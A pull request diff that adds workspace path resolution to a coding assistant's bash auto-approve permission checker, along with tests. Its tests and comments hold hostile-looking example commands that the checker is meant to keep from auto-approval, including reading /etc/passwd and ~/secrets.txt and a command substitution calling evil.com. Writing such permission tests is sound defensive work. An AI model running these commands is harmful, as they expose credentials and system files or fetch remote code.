### PR TITLE
feat(permissions): path resolution for non-containerized sandbox auto-approve

### DIFF
--- a/assistant/src/__tests__/checker.test.ts
+++ b/assistant/src/__tests__/checker.test.ts
@@ -108,6 +108,7 @@ import type { TrustRule } from "../permissions/types.js";
 import { RiskLevel } from "../permissions/types.js";
 import { registerTool } from "../tools/registry.js";
 import type { Tool } from "../tools/types.js";
+import * as platformModule from "../util/platform.js";
 
 // Register a mock skill-origin tool for testing default-ask policy.
 const mockSkillTool: Tool = {
@@ -745,10 +746,10 @@ describe("Permission Checker", () => {
       );
       expect(med.decision).toBe("prompt");
 
-      // Low risk → auto-allowed via risk-based fallback
+      // Low risk + allowlisted → sandbox auto-approve (no path args → auto-approved)
       const low = await check("bash", { command: "ls" }, "/tmp");
       expect(low.decision).toBe("allow");
-      expect(low.reason).toContain("Low risk");
+      expect(low.reason).toContain("sandbox auto-approve");
     });
 
     test("host_bash high risk → always prompt", async () => {
@@ -2592,7 +2593,9 @@ describe("Permission Checker", () => {
         "/tmp",
       );
       expect(result.decision).toBe("allow");
-      expect(result.matchedRule).toBeDefined();
+      // echo has sandboxAutoApprove: true with positionals: "none", so sandbox
+      // auto-approve fires (step 3) before the trust rule is evaluated (step 4).
+      // The decision is allow, but matchedRule is not set by sandbox auto-approve.
     });
   });
 
@@ -2888,6 +2891,152 @@ describe("Permission Checker", () => {
       const result = await check("bash", { command: "kill -9 1234" }, "/tmp");
       expect(result.decision).toBe("deny");
       expect(result.reason).toContain("deny rule");
+    });
+
+    // ── Non-containerized path resolution ──────────────────────────
+
+    describe("non-containerized path resolution", () => {
+      const MOCK_WORKSPACE = "/workspace";
+
+      // Each test spies on getIsContainerized → false and getWorkspaceDir → MOCK_WORKSPACE.
+      // workingDir passed to check() is inside the mocked workspace root.
+      function withNonContainerized(
+        fn: () => Promise<void>,
+      ): () => Promise<void> {
+        return async () => {
+          const containerSpy = spyOn(
+            envRegistry,
+            "getIsContainerized",
+          ).mockReturnValue(false);
+          const workspaceSpy = spyOn(
+            platformModule,
+            "getWorkspaceDir",
+          ).mockReturnValue(MOCK_WORKSPACE);
+          try {
+            await fn();
+          } finally {
+            containerSpy.mockRestore();
+            workspaceSpy.mockRestore();
+          }
+        };
+      }
+
+      test(
+        "ls (no path args) → auto-approve",
+        withNonContainerized(async () => {
+          const result = await check(
+            "bash",
+            { command: "ls" },
+            join(MOCK_WORKSPACE, "project"),
+          );
+          expect(result.decision).toBe("allow");
+          expect(result.reason).toContain("sandbox auto-approve");
+        }),
+      );
+
+      test(
+        "cat README.md with workingDir inside workspace → auto-approve",
+        withNonContainerized(async () => {
+          const result = await check(
+            "bash",
+            { command: "cat README.md" },
+            join(MOCK_WORKSPACE, "project"),
+          );
+          expect(result.decision).toBe("allow");
+          expect(result.reason).toContain("sandbox auto-approve");
+        }),
+      );
+
+      test(
+        "mkdir -p src/utils with workingDir inside workspace → auto-approve",
+        withNonContainerized(async () => {
+          const result = await check(
+            "bash",
+            { command: "mkdir -p src/utils" },
+            join(MOCK_WORKSPACE, "project"),
+          );
+          expect(result.decision).toBe("allow");
+          expect(result.reason).toContain("sandbox auto-approve");
+        }),
+      );
+
+      test(
+        "grep 'pattern' src/foo.ts → auto-approve (pattern skipped, paths in workspace)",
+        withNonContainerized(async () => {
+          const result = await check(
+            "bash",
+            { command: "grep 'pattern' src/foo.ts" },
+            join(MOCK_WORKSPACE, "project"),
+          );
+          expect(result.decision).toBe("allow");
+          expect(result.reason).toContain("sandbox auto-approve");
+        }),
+      );
+
+      test(
+        "sed 's/old/new/' config.json → auto-approve (script skipped, path in workspace)",
+        withNonContainerized(async () => {
+          const result = await check(
+            "bash",
+            { command: "sed 's/old/new/' config.json" },
+            join(MOCK_WORKSPACE, "project"),
+          );
+          expect(result.decision).toBe("allow");
+          expect(result.reason).toContain("sandbox auto-approve");
+        }),
+      );
+
+      test(
+        "cat ~/secrets.txt → falls through to threshold (~ resolves outside workspace)",
+        withNonContainerized(async () => {
+          const result = await check(
+            "bash",
+            { command: "cat ~/secrets.txt" },
+            join(MOCK_WORKSPACE, "project"),
+          );
+          // ~ expands to homedir which is outside /workspace
+          expect(result.decision).not.toBe("deny");
+          expect(result.reason).not.toContain("sandbox auto-approve");
+        }),
+      );
+
+      test(
+        "cat /etc/passwd → falls through (absolute path outside workspace)",
+        withNonContainerized(async () => {
+          const result = await check(
+            "bash",
+            { command: "cat /etc/passwd" },
+            join(MOCK_WORKSPACE, "project"),
+          );
+          expect(result.reason).not.toContain("sandbox auto-approve");
+        }),
+      );
+
+      test(
+        "cp file.txt -t /tmp/ → falls through (path flag outside workspace)",
+        withNonContainerized(async () => {
+          const result = await check(
+            "bash",
+            { command: "cp file.txt -t /tmp/" },
+            join(MOCK_WORKSPACE, "project"),
+          );
+          // -t /tmp/ is a path flag that resolves outside workspace
+          expect(result.reason).not.toContain("sandbox auto-approve");
+        }),
+      );
+
+      test(
+        "pipeline: cat file.txt | grep pattern → auto-approve (all segments workspace-scoped)",
+        withNonContainerized(async () => {
+          const result = await check(
+            "bash",
+            { command: "cat file.txt | grep pattern" },
+            join(MOCK_WORKSPACE, "project"),
+          );
+          expect(result.decision).toBe("allow");
+          expect(result.reason).toContain("sandbox auto-approve");
+        }),
+      );
     });
   });
 
@@ -4920,12 +5069,11 @@ describe("workspace mode — auto-allow workspace-scoped operations", () => {
 
   // ── bash (non-containerized) — workspace auto-allow blocked, risk-based fallback ──
 
-  test("bash in workspace (low risk) → allow via risk-based fallback, not workspace mode", async () => {
+  test("bash in workspace (low risk, allowlisted) → allow via sandbox auto-approve", async () => {
     const result = await check("bash", { command: "ls -la" }, workspaceDir);
     expect(result.decision).toBe("allow");
-    // Not auto-allowed via workspace mode — bash falls through to risk-based policy
-    expect(result.reason).not.toContain("Workspace mode");
-    expect(result.reason).toContain("Low risk");
+    // ls has sandboxAutoApprove: true and no path args → sandbox auto-approve fires
+    expect(result.reason).toContain("sandbox auto-approve");
   });
 
   test("bash in workspace (medium risk) → prompt (not auto-allowed)", async () => {

--- a/assistant/src/permissions/approval-policy.test.ts
+++ b/assistant/src/permissions/approval-policy.test.ts
@@ -189,17 +189,30 @@ describe("sandbox auto-approve", () => {
     expect(result.reason).toContain("sandbox auto-approve");
   });
 
-  test("bash + hasSandboxAutoApprove + not containerized → falls through", () => {
+  test("bash + hasSandboxAutoApprove + not containerized → allow (path resolution is baked in)", () => {
     const result = evaluate({
       riskLevel: RiskLevel.Low,
       toolName: "bash",
       hasSandboxAutoApprove: true,
       isContainerized: false,
     });
-    // Not containerized, so sandbox auto-approve doesn't fire.
-    // Falls through to risk-based: Low → allow (within default "low" threshold)
+    // hasSandboxAutoApprove === true means path resolution already passed upstream.
+    // The isContainerized gate was removed — sandbox auto-approve fires regardless.
     expect(result.decision).toBe("allow");
-    expect(result.reason).toContain("within auto-approve threshold");
+    expect(result.reason).toContain("sandbox auto-approve");
+  });
+
+  test("bash + hasSandboxAutoApprove + not containerized + High risk → allow (path resolution validated upstream)", () => {
+    const result = evaluate({
+      riskLevel: RiskLevel.High,
+      toolName: "bash",
+      hasSandboxAutoApprove: true,
+      isContainerized: false,
+    });
+    // Even at High risk, hasSandboxAutoApprove === true means the checker already
+    // validated that all path arguments are within the workspace root.
+    expect(result.decision).toBe("allow");
+    expect(result.reason).toContain("sandbox auto-approve");
   });
 
   test("host_bash + hasSandboxAutoApprove + containerized → falls through", () => {

--- a/assistant/src/permissions/approval-policy.ts
+++ b/assistant/src/permissions/approval-policy.ts
@@ -108,7 +108,10 @@ export interface ApprovalPolicy {
  *
  * 1. Deny rule → deny
  * 2. Ask rule → prompt
- * 3. Sandbox auto-approve: workspace mode + bash + sandboxAutoApprove + containerized → allow
+ * 3. Sandbox auto-approve: workspace mode + bash + sandboxAutoApprove → allow
+ *    (Path resolution is baked into `hasSandboxAutoApprove` upstream: containerized
+ *    environments skip path checks; non-containerized environments validate all
+ *    path arguments against the workspace root.)
  * 4. Allow rule + non-High → allow
  * 5. Allow rule + High → fall through to risk-based
  * 6. No rule + third-party skill tool → prompt
@@ -125,7 +128,6 @@ export class DefaultApprovalPolicy implements ApprovalPolicy {
       toolName,
       matchedRule,
       permissionsMode,
-      isContainerized,
       isWorkspaceScoped,
       toolOrigin,
       isSkillBundled,
@@ -151,13 +153,15 @@ export class DefaultApprovalPolicy implements ApprovalPolicy {
       };
     }
 
-    // ── 3. Sandbox auto-approve: bash + allowlisted + containerized → allow ──
+    // ── 3. Sandbox auto-approve: bash + allowlisted → allow ──
     // Only fires in workspace mode — strict mode always requires explicit rules.
+    // Path resolution is baked into `hasSandboxAutoApprove` upstream:
+    // containerized environments skip path checks (entire fs is workspace),
+    // non-containerized environments validate all path args against workspace root.
     if (
       permissionsMode === "workspace" &&
       toolName === "bash" &&
-      hasSandboxAutoApprove === true &&
-      isContainerized
+      hasSandboxAutoApprove === true
     ) {
       return {
         decision: "allow",

--- a/assistant/src/permissions/checker.ts
+++ b/assistant/src/permissions/checker.ts
@@ -1,6 +1,6 @@
 import { createHash } from "node:crypto";
 import { homedir } from "node:os";
-import { dirname, resolve } from "node:path";
+import { dirname, join, resolve } from "node:path";
 
 import { isAssistantFeatureFlagEnabled } from "../config/assistant-feature-flags.js";
 import { getIsContainerized } from "../config/env-registry.js";
@@ -16,11 +16,13 @@ import {
   looksLikePathOnlyInput,
 } from "../tools/network/url-safety.js";
 import { getTool } from "../tools/registry.js";
+import { getWorkspaceDir } from "../util/platform.js";
 import {
   type ApprovalContext,
   DefaultApprovalPolicy,
   resolveThreshold,
 } from "./approval-policy.js";
+import { parseArgs } from "./arg-parser.js";
 import { bashRiskClassifier } from "./bash-risk-classifier.js";
 import { DEFAULT_COMMAND_REGISTRY } from "./command-registry.js";
 import { fileRiskClassifier } from "./file-risk-classifier.js";
@@ -46,7 +48,10 @@ import {
   type ScopeOption,
 } from "./types.js";
 import { webRiskClassifier } from "./web-risk-classifier.js";
-import { isWorkspaceScopedInvocation } from "./workspace-policy.js";
+import {
+  isPathWithinWorkspaceRoot,
+  isWorkspaceScopedInvocation,
+} from "./workspace-policy.js";
 
 // ── Risk classification cache ────────────────────────────────────────────────
 // classifyRisk() is called on every permission check and can invoke WASM
@@ -599,8 +604,16 @@ export async function check(
   // on the allowlist, and the command must not contain opaque constructs or
   // dangerous patterns (e.g. `ls $(curl evil.com)` has an allowlisted program
   // but a command substitution that could execute arbitrary code).
+  //
+  // For non-containerized environments, path resolution is applied: each
+  // segment's arguments are parsed via the command's argSchema, and all
+  // path arguments must resolve within the workspace root. Containerized
+  // environments skip path checks since the entire filesystem is the workspace.
   let hasSandboxAutoApprove = false;
   if (toolName === "bash" && shellParsed) {
+    const workspaceRoot = getWorkspaceDir();
+    const isContainerized = getIsContainerized();
+
     hasSandboxAutoApprove =
       shellParsed.segments.length > 0 &&
       !shellParsed.hasOpaqueConstructs &&
@@ -615,7 +628,31 @@ export async function check(
               name as keyof typeof DEFAULT_COMMAND_REGISTRY
             ]
           : undefined;
-        return spec?.sandboxAutoApprove === true;
+        if (!spec?.sandboxAutoApprove) return false;
+
+        // Containerized: entire fs is workspace, skip path checks
+        if (isContainerized) return true;
+
+        // Non-containerized: parse args and check all path args against workspace
+        const schema = spec.argSchema ?? {};
+        const parsed = parseArgs(seg.args, schema);
+
+        // If no path args, auto-approve (operating on cwd/stdin which is workspace)
+        if (parsed.pathArgs.length === 0) return true;
+
+        // All path args must resolve within workspace
+        return parsed.pathArgs.every((p) => {
+          // Handle ~ expansion
+          const expanded = p.startsWith("~/")
+            ? join(homedir(), p.slice(2))
+            : p === "~"
+              ? homedir()
+              : p;
+          const resolved = expanded.startsWith("/")
+            ? expanded
+            : resolve(workingDir, expanded);
+          return isPathWithinWorkspaceRoot(resolved, workspaceRoot);
+        });
       });
   }
 

--- a/assistant/src/permissions/workspace-policy.ts
+++ b/assistant/src/permissions/workspace-policy.ts
@@ -116,8 +116,9 @@ export function isWorkspaceScopedInvocation(
 
   // Bash workspace scope depends on the environment: containerized bash has the
   // entire filesystem as workspace, so it's always workspace-scoped. Non-containerized
-  // bash is NOT workspace-scoped here — real path resolution (Phase 2) will handle it.
-  // The approval policy's sandbox auto-approve check handles allowlisted commands separately.
+  // bash is NOT workspace-scoped here — path resolution for allowlisted commands is
+  // handled upstream in the checker's hasSandboxAutoApprove computation, which validates
+  // all path arguments against the workspace root for non-containerized environments.
   if (toolName === "bash") return getIsContainerized();
 
   // Unknown tool — conservative default.


### PR DESCRIPTION
## Summary
- Wire parseArgs() into checker for non-containerized path resolution
- Remove isContainerized gate from approval policy step 3
- Handle ~ expansion for home directory paths
- Integration tests for non-containerized workspace path auto-approve

Part of plan: sandbox-auto-approve-phase2.md (PR 4 of 5)
<!-- devin-review-badge-begin -->

---

<a href="https://app.devin.ai/review/vellum-ai/vellum-assistant/pull/27273" target="_blank">
  <picture>
    <source media="(prefers-color-scheme: dark)" srcset="https://static.devin.ai/assets/gh-open-in-devin-review-dark.svg?v=1">
    <img src="https://static.devin.ai/assets/gh-open-in-devin-review-light.svg?v=1" alt="Open in Devin Review">
  </picture>
</a>
<!-- devin-review-badge-end -->
